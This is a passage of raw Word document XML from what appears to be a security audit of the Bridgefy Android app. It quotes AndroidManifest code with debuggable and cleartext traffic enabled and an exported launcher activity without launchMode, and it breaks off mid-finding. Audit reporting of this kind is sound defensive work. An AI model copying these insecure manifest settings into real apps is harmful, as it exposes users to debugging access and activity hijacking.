          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>versions</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>34</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto" w:before="238"/>
        <w:ind w:left="720" w:right="376"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>This issue can be confirmed by reviewing the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>AndroidManifest </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>of the Android</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="80"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>application.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Affected</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>File:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="38"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>bridgefy-app-android/app/src/main/AndroidManifest.xml</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="76"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Affected</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Code:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="37"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="62A25C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>application </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>android:theme</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"@style/Theme.BridgefyApp"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="31"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>android:label</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"@string/app_launcher_name"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-25"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>android:icon</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"@mipmap/ic_launcher" </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>android:name</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"me.bridgefy.main.App" </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>android:debuggable</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"true"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="0"/>
        <w:ind w:left="720" w:right="2112" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>android:allowBackup</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"false"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-25"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>android:logo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"@drawable/ic_bridgefy" </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>android:hardwareAccelerated</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"true" </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>android:supportsRtl</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"true"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="0"/>
        <w:ind w:left="720" w:right="2169" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>android:fullBackupContent</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"false"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-25"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>android:usesCleartextTraffic</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"true" </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>android:appComponentFactory</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"androidx.core.app.CoreComponentFactory"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>&gt; [...]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="62A25C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>activity </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>android:theme</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"@style/Theme.BridgefyApp.Splash"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="32"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>android:name</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"me.bridgefy.main.ux.startup.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>StartupActivity</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-3"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>android:exported</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"true"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="32"/>
        <w:ind w:left="1313" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="62A25C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>intent-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="62A25C"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>filter</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="31"/>
        <w:ind w:left="1808" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="62A25C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>action </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>android:name</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"android.intent.action.VIEW" </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="32"/>
        <w:ind w:left="1808" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="62A25C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>action </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>android:name</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"android.intent.action.MAIN" </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="31"/>
        <w:ind w:left="1808" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="62A25C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>category </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>android:name</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"android.intent.category.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>LAUNCHER</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>" </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="32"/>
        <w:ind w:left="1313" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>&lt;/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="62A25C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>intent-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="62A25C"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>filter</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="32"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>&lt;/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="62A25C"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>activity</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="112"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>As</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>can</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>be</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>seen</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>above,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>launchMode</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>is</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>not</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>set</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>and</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>hence</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>defaults</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>to</w:t>
      </w:r>
      <w:r>
